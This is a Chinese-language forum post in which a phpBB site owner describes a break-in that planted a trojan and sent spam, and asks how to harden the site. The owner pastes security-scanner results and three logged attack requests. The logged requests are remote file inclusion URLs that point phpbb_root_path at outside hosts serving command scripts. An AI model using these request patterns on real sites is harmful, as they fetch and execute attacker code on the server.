● CrackerTracker 版本:CrackerTracker Professional v5.0.4
我在後台的 CrackerTracker 的 Filescanner 裡面發現有個 Show Results 選項,它顯示出某些檔案的安全性,例如:
tellafriend.php : SAFE
quick_reply.php : Code in the file is possibly executable beyond from phpBB
album_cat.php : common.php / pagestart.php maybe not be or too late included
.
.
.
還有一些尚未列出,不知道我該如何去修正這些檔案,使其更加安全?或者我應該如何去做?
另外前些天發現被駭客入侵,竄改了網頁,還好資料沒有被更動!後來發現到,駭客竟然在 phpbb 的 captcha 資料夾中加入了一個木馬程式,並且散佈廣告信!今天,我利用 CrackerTracker 查看紀錄檔,發現如下紀錄:
第一個紀錄 寫:/includes/functions.php?phpbb_root_path=http://www.orderofronin.com/vb/impex/cmd.txt?
第二個紀錄 寫:/phpbb/album.php?user_id=40&mode=list/language/lang_german/admin_main_album.php?phpbb_root_path=http://www.woman.fromland.net//language ... man/r8.txt?
赫然發現,竟然可以利用 language/lang_german/ 裡面的檔案進行非法動作!第三個紀錄 寫:/phpbb/album.php?user_id=40&mode=list/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.woman.fromland.net//language ... man/r8.txt?
各位大大,我該如何是好啊?這樣子的網站安全又該如何去防範?